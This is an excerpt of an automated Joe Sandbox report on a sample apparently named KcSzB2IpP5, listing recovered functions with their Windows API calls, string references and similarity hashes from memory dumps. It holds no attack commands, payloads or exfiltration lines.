InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004DC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004DC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004DC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004DC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004DC5F0
InternetCloseHandle.WININET(00000000), ref: 004DC5FB

Strings

, xrefs: 004DC575

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 4a9112cbd204e8447338380010e02484053624f994bcca431430c9da87e90d8d
Instruction ID: ef04cd400f494b7ce64b2a0bc7ae5019f2392af9599c744ec9007cb1bac1867d
Opcode Fuzzy Hash: 4a9112cbd204e8447338380010e02484053624f994bcca431430c9da87e90d8d
Instruction Fuzzy Hash: A2515BB050020ABFDB219F61D9E8ABB7BFCEB08744F00442BF94596350DB38E914DB69

Function 004F856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 004F8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004F85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004F85AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004F85BA
GlobalLock.KERNEL32(00000000), ref: 004F85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004F85D7
GlobalUnlock.KERNEL32(00000000), ref: 004F85E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004F85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 004F85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,004FFC38,?), ref: 004F8611
GlobalFree.KERNEL32(00000000), ref: 004F8621
GetObjectW.GDI32(?,00000018,?), ref: 004F8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 004F8671
DeleteObject.GDI32(?), ref: 004F8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004F86AF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 7adb5d360459509e231b5a347e2912dbc11afad36c35d0346f99f0a1c0a81169
Instruction ID: 08581b997fcbc0f43c3d28ab7acd5c12ce96f921f76bbea7474441c898322b05
Opcode Fuzzy Hash: 7adb5d360459509e231b5a347e2912dbc11afad36c35d0346f99f0a1c0a81169
Instruction Fuzzy Hash: ED412775600208BFDB11DFA5CD88EBB7BB8EF89B11F104069F905EB260DB349911DB28

Function 004D14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 004D1502
VariantCopy.OLEAUT32(?,?), ref: 004D150B
VariantClear.OLEAUT32(?), ref: 004D1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004D15FB
VarR8FromDec.OLEAUT32(?,?), ref: 004D1657
VariantInit.OLEAUT32(?), ref: 004D1708
SysFreeString.OLEAUT32(?), ref: 004D178C
VariantClear.OLEAUT32(?), ref: 004D17D8
VariantClear.OLEAUT32(?), ref: 004D17E7
VariantInit.OLEAUT32(00000000), ref: 004D1823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 004D1625
Default, xrefs: 004D16AF

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 1e159b09821bef103940886b53bf8b897cff1f9325ecbf1477041e59a839b428
Instruction ID: c0ecdd6a6751aac880af1d82bc43e47521f47ea2a9f7f6f2c18411122619263f
Opcode Fuzzy Hash: 1e159b09821bef103940886b53bf8b897cff1f9325ecbf1477041e59a839b428
Instruction Fuzzy Hash: 5FD10071A00105FBDB109F66E8A4BB9B7B5BF45700F14805BE806AB3A0DB3CDC15DB6A

Function 004EB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

Part of subcall function 004EC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004EB6AE,?,?), ref: 004EC9B5
Part of subcall function 004EC998: _wcslen.LIBCMT ref: 004EC9F1
Part of subcall function 004EC998: _wcslen.LIBCMT ref: 004ECA68
Part of subcall function 004EC998: _wcslen.LIBCMT ref: 004ECA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004EB6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004EB772
RegDeleteValueW.ADVAPI32(?,?), ref: 004EB80A
RegCloseKey.ADVAPI32(?), ref: 004EB87E
RegCloseKey.ADVAPI32(?), ref: 004EB89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 004EB8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004EB904
RegDeleteKeyW.ADVAPI32(?,?), ref: 004EB922
FreeLibrary.KERNEL32(00000000), ref: 004EB983
RegCloseKey.ADVAPI32(00000000), ref: 004EB994

Strings

advapi32.dll, xrefs: 004EB8ED
RegDeleteKeyExW, xrefs: 004EB8FE

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 04644b03640c73877c85efefdfb14ef0152d6776788a1ff6e12323af96b57c71
Instruction ID: a37a8da03ca70ad6e02b439f7f6361eb2fc06d8a3804d7534f99c8b458461eca
Opcode Fuzzy Hash: 04644b03640c73877c85efefdfb14ef0152d6776788a1ff6e12323af96b57c71
Instruction Fuzzy Hash: 34C17B70204241AFD714DF16C494F2ABBE5FF84308F14849EE49A4B7A2DB79EC46CB96

Function 004E255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004E25D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004E25E8
CreateCompatibleDC.GDI32(?), ref: 004E25F4
SelectObject.GDI32(00000000,?), ref: 004E2601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 004E266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004E26AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004E26D0
SelectObject.GDI32(?,?), ref: 004E26D8
DeleteObject.GDI32(?), ref: 004E26E1
DeleteDC.GDI32(?), ref: 004E26E8
ReleaseDC.USER32(00000000,?), ref: 004E26F3

Strings

(, xrefs: 004E268D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 7450ea91f7972f31660b7a3424e8d337f989648236c063e3ac4adf0a040c32cd
Instruction ID: cca1843b28c27798ef6736f93a6f6ca0681e175c122332268c68eaae5a156db7
Opcode Fuzzy Hash: 7450ea91f7972f31660b7a3424e8d337f989648236c063e3ac4adf0a040c32cd
Instruction Fuzzy Hash: AB611275D00219EFCF04CFA9CA84EAEBBB9FF48310F20852AE955A7250D774A951CF94

Function 0049DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0049DAA1

Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D659
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D66B
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D67D
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D68F
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D6A1
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D6B3
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D6C5
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D6D7
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D6E9
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D6FB
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D70D
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D71F
Part of subcall function 0049D63C: _free.LIBCMT ref: 0049D731

_free.LIBCMT ref: 0049DA96

Part of subcall function 004929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000), ref: 004929DE
Part of subcall function 004929C8: GetLastError.KERNEL32(00000000,?,0049D7D1,00000000,00000000,00000000,00000000,?,0049D7F8,00000000,00000007,00000000,?,0049DBF5,00000000,00000000), ref: 004929F0

_free.LIBCMT ref: 0049DAB8
_free.LIBCMT ref: 0049DACD
_free.LIBCMT ref: 0049DAD8
_free.LIBCMT ref: 0049DAFA
_free.LIBCMT ref: 0049DB0D
_free.LIBCMT ref: 0049DB1B
_free.LIBCMT ref: 0049DB26
_free.LIBCMT ref: 0049DB5E
_free.LIBCMT ref: 0049DB65
_free.LIBCMT ref: 0049DB82
_free.LIBCMT ref: 0049DB9A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 1d074e1374a977b1c5c3ebc6767d9a8754e662047a6ccd8bc8e607acc1d3e9c5
Instruction ID: e6db35ca416f849c074bda94f36380542cfe5c35049468365f71cd8cd40cbfa3
Opcode Fuzzy Hash: 1d074e1374a977b1c5c3ebc6767d9a8754e662047a6ccd8bc8e607acc1d3e9c5
Instruction Fuzzy Hash: 93317EB1A04204AFDF21AA3AE941B5B7FE9FF00324F10443FE049D7291DA79AC50C768

Function 004C365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 004C369C
_wcslen.LIBCMT ref: 004C36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004C3797
GetClassNameW.USER32(?,?,00000400), ref: 004C380C
GetDlgCtrlID.USER32(?), ref: 004C385D
GetWindowRect.USER32(?,?), ref: 004C3882
GetParent.USER32(?), ref: 004C38A0
ScreenToClient.USER32(00000000), ref: 004C38A7
GetClassNameW.USER32(?,?,00000100), ref: 004C3921
GetWindowTextW.USER32(?,?,00000400), ref: 004C395D

Strings

%s%u, xrefs: 004C3734

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 4ad3e48dc9a4a196020d0b16f7cd0ce13ff384ce2abf4ddd817d325e0108ea5e
Instruction ID: 3a8d3869d4d47ed530a09f2da5b5d78d60249f4bf4e2d78e0cbba4cef0566e14
Opcode Fuzzy Hash: 4ad3e48dc9a4a196020d0b16f7cd0ce13ff384ce2abf4ddd817d325e0108ea5e
Instruction Fuzzy Hash: C991E275204206AFD758DF24C885FABF7A8FF44305F00852EF999C2290DB38EA55CBA5

Function 004C4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 004C4994
GetWindowTextW.USER32(?,?,00000400), ref: 004C49DA
_wcslen.LIBCMT ref: 004C49EB
CharUpperBuffW.USER32(?,00000000), ref: 004C49F7
_wcsstr.LIBVCRUNTIME ref: 004C4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 004C4A64
GetWindowTextW.USER32(?,?,00000400), ref: 004C4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 004C4AE6
GetClassNameW.USER32(?,?,00000400), ref: 004C4B20
GetWindowRect.USER32(?,?), ref: 004C4B8B

Strings

ThumbnailClass, xrefs: 004C4A6F, 004C4AF1

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: c4f47b23ff1ddc5963fb0a1a30ba3b22d735f63d14b4c34d3c1b5a5181b3675c
Instruction ID: a1e8e5ab4dde637fad32ec0609637cdfe0bf2e5a704427836cd6856d7a8abce0
Opcode Fuzzy Hash: c4f47b23ff1ddc5963fb0a1a30ba3b22d735f63d14b4c34d3c1b5a5181b3675c
Instruction Fuzzy Hash: 6291DD750082059BDB44DF14CA90FAB77A8FF84314F04846EFD858A295EB38ED45CBA9

Function 004F8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00479BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00479BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004F8D5A
GetFocus.USER32 ref: 004F8D6A
GetDlgCtrlID.USER32(00000000), ref: 004F8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 004F8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 004F8ECF
GetMenuItemCount.USER32(?), ref: 004F8EEC
GetMenuItemID.USER32(?,00000000), ref: 004F8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 004F8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 004F8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004F8FA1

Strings

0, xrefs: 004F8E9F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 34e080a17d0f03609df76038394c0bc76c0a994f6ad7ee6c8f26a74d0bff165c
Instruction ID: bb4e36fb86e515f266b42e845b3529702a5bcf2ce173c9a44df3828c08f5b296
Opcode Fuzzy Hash: 34e080a17d0f03609df76038394c0bc76c0a994f6ad7ee6c8f26a74d0bff165c
Instruction Fuzzy Hash: CF818E71508319AFD710CF24C884ABB77E9FB98314F14095EFA84DB291DB38D905CB6A

Function 004CDC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 004CDC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004CDC46
_wcslen.LIBCMT ref: 004CDC50
_wcsstr.LIBVCRUNTIME ref: 004CDCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004CDCBC

Strings

DefaultLangCodepage, xrefs: 004CDD1F
04090000, xrefs: 004CDCF2
StringFileInfo\, xrefs: 004CDC8F
\VarFileInfo\Translation, xrefs: 004CDCB4
%u.%u.%u.%u, xrefs: 004CDD9A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 4b16e4a7258253376d1f9a460c52cec7b9b0e173e1bdc938bd2bd63beb4a4ae3
Instruction ID: e58dda8a2f570b27e6bad8e954f7e6784dddad362a7ddc256b2b7f611e50fe01
Opcode Fuzzy Hash: 4b16e4a7258253376d1f9a460c52cec7b9b0e173e1bdc938bd2bd63beb4a4ae3
Instruction Fuzzy Hash: 61412336D402057ADB14B6669C43FFF37ACEF42714F10046FF905A6182EA78A90197AD

Function 004ECC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 004ECC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 004ECC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 004ECD48

Part of subcall function 004ECC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004ECCAA
Part of subcall function 004ECC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 004ECCBD
Part of subcall function 004ECC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004ECCCF
Part of subcall function 004ECC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 004ECD05
Part of subcall function 004ECC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 004ECD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 004ECCF3

Strings

advapi32.dll, xrefs: 004ECCB8
RegDeleteKeyExW, xrefs: 004ECCC9

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 3010d6f62af0f303f65e95f1a391d40355c73f338e82322d313380385649fd47
Instruction ID: 28d3be40dfc2a1a228122f309f5841382f664bf433d8b305e57e165c3c8f21b4
Opcode Fuzzy Hash: 3010d6f62af0f303f65e95f1a391d40355c73f338e82322d313380385649fd47
Instruction Fuzzy Hash: 3B31607190112DBBD7208B95DDC8EFFBB7CEF55751F000176A905E2240DA389A46DAA8

Function 004CE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 004CE6B4

Part of subcall function 0047E551: timeGetTime.WINMM(?,?,004CE6D4), ref: 0047E555

Sleep.KERNEL32(0000000A), ref: 004CE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 004CE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004CE727
SetActiveWindow.USER32 ref: 004CE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004CE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 004CE773
Sleep.KERNEL32(000000FA), ref: 004CE77E
IsWindow.USER32 ref: 004CE78A
EndDialog.USER32(00000000), ref: 004CE79B

Strings

BUTTON, xrefs: 004CE719

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: cba9c9e2a77bd79bb70568e5d51b1cc040711f722bc98ee87d1772a89a180ef2
Instruction ID: 2740f1dd05ad66d2399432547d79382da60a572ac4ae2b5b8a4347d6bd3dbac9
Opcode Fuzzy Hash: cba9c9e2a77bd79bb70568e5d51b1cc040711f722bc98ee87d1772a89a180ef2
Instruction Fuzzy Hash: A0219279200A08AFEB405F23EDCAF363B69FB64349F10143AF401813A1DB75AC24EA1C

Function 004CE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004CEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004CEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004CEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004CEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004CEAA7

Strings

close PlayMe, xrefs: 004CEA6E, 004CEA9B
alias PlayMe, xrefs: 004CEA36
play PlayMe wait, xrefs: 004CEA91
status PlayMe mode, xrefs: 004CEA58
play PlayMe, xrefs: 004CEAA2
open , xrefs: 004CEA0C

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
